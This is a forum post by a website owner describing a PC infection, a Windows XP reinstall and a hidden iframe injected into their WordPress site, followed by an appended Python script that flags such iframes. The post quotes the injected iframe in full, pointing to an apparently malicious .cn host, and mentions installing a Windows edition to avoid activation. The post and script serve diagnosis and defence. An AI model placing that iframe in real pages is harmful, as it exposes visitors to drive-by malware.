Thanks for the responses, guys.
I did decide to just reformat. I hadn't even thought of that option when I posted this - I've only just recently moved all my files to network storage. Incredibly lucky timing!
Master script maker: I forgot to mention this, but I was unable to stop the process - it would just give an error. It would also deselect itself if I left-clicked on it. If I booted without startup services, the process never showed up.
The plot thickens...
So after reformatting, I noticed that my site was messed up. I checked the source and there's a malicious iframe. I am apparently the victim of an injection attack, and this is the code it is sticking on my site:
Code:
<iframe src="http://findbigname.cn/ts/in.cgi?banner4" width=2 height=4 style="visibility: hidden"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Our local copies of the files (on the networked storage) do not have this junk in them - only the ones on the server do.
Door #1, Door #2, or Door #3?!
Door #1: The timing of the injection seems to match the timing of my infection. A couple weeks ago there was a topic here on DD [edit: found the topic] about a virus going around that harvests your FTP logins and injects its malicious code onto whatever sites it can successfully access. The only site that seems to have been attacked, however, is my own (and not my clients'). I would think there would have been more sites affected if this was the method.
Are there some kind of logs I can check to see how and when the injection took place? I am a total server noob. I use DreamHost.
Door #2: Just a few days ago I posted a topic asking about the potential vulnerabilities of my contact form script:
http://www.dynamicdrive.com/forums/s...ad.php?t=44770
The timing would make it pretty damn ironic, but this form has been up for a month or so.
Door #3: Could it be because my site is a WordPress site? I used DreamHost's one-click install service to install it, and it was the most current version at the time. This was about a month and a half ago. WordPress would tell me if it needed to be updated, right? It tells me when I need to update plugins, and I always do.
This wall of text just keeps going. You are a trooper.
Getting back to that reformatting...
About 8 years ago I bought a pre-built PC with Windows XP Home. A few years back I replaced that computer with one I put together. Since I didn't have a Windows disc from my pre-built, I downloaded one of those 9-in-1 Windows XP SP2 DVDs, and installed Windows XP Home from that, using my legitimate serial number and everything.
Activating Windows on the new machine, as I found out, was a nightmare. I had to call Microsoft and spend an hour on the phone with them. So this time after the reformat, I installed Windows XP Corporate instead, as it doesn't ask for activation.
As this was SP2, it needed a lot of updating. I always seem to have trouble getting Windows Update to do its thing on fresh XP installations, and so far this has been no different. First I set it to update at the next hour. Nothing. I then set it to download the updates and let me choose when to install them, waited an hour, and still nothing.
I'm pretty sure I'm doing it wrong, lol. I always have to toggle these options again and again and restart the computer to get the updates to start downloading. When I was finally able to get the first batch of updates to start, it downloaded and installed 34 updates.
And now it's stuck. It won't download updates no matter what I try or what options I pick. This is a totally new XP install - only mobo and video card drivers installed. Is there a way to manually check for updates? Should I bite the bullet and install Home again?
Longest post ever. Thanks for reading!
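Added example, not part of the original post: a Python sketch that automates the comparison described above (known-good local copies versus the files on the server) and flags iframes with the traits of the quoted tag. The function names, the 4-pixel size threshold and the `injected.example` sample trees are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
DIM = re.compile(r"\b(?:width|height)\s*=\s*[\"']?(\d+)", re.I)

def suspicious_iframes(text):
    """Return (offset, tag, reasons) per suspect iframe; the <=4px threshold is an assumption."""
    doctype = re.search(r"<!doctype", text, re.I)
    hits = []
    for tag in IFRAME.finditer(text):
        checks = {
            "hidden-style": bool(HIDDEN.search(tag.group())),
            "tiny-size": any(int(v) <= 4 for v in DIM.findall(tag.group())),
            "before-doctype": bool(doctype) and tag.start() < doctype.start(),
        }
        reasons = [name for name, hit in checks.items() if hit]
        if reasons:
            hits.append((tag.start(), tag.group(), reasons))
    return hits

def compare_trees(server_dir, clean_dir):
    """Report server files that differ from, or are missing in, the clean copy."""
    report = {}
    for path in sorted(p for p in Path(server_dir).rglob("*") if p.is_file()):
        rel = path.relative_to(server_dir)
        clean = Path(clean_dir) / rel
        data = path.read_bytes()
        if clean.is_file() and clean.read_bytes() == data:
            continue  # byte-identical to the known-good copy
        hits = suspicious_iframes(data.decode("utf-8", "replace"))
        report[rel.as_posix()] = {"in_clean_copy": clean.is_file(), "iframes": hits}
    return report

def demo():
    """Constructed sample trees: one page on the 'server' has a tag prepended."""
    page = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\n<html></html>\n'
    bad = '<iframe src="http://injected.example/x" width=2 height=4 style="visibility: hidden"></iframe>'
    with tempfile.TemporaryDirectory() as tmp:
        clean, server = Path(tmp, "clean"), Path(tmp, "server")
        for d, body in ((clean, page), (server, bad + page)):
            d.mkdir()
            (d / "index.html").write_text(body)
            (d / "about.html").write_text(page)
        return compare_trees(server, clean)

if __name__ == "__main__":
    print(demo())
```

Files listed with `in_clean_copy` set to False exist only on the server and deserve the same scrutiny as modified ones.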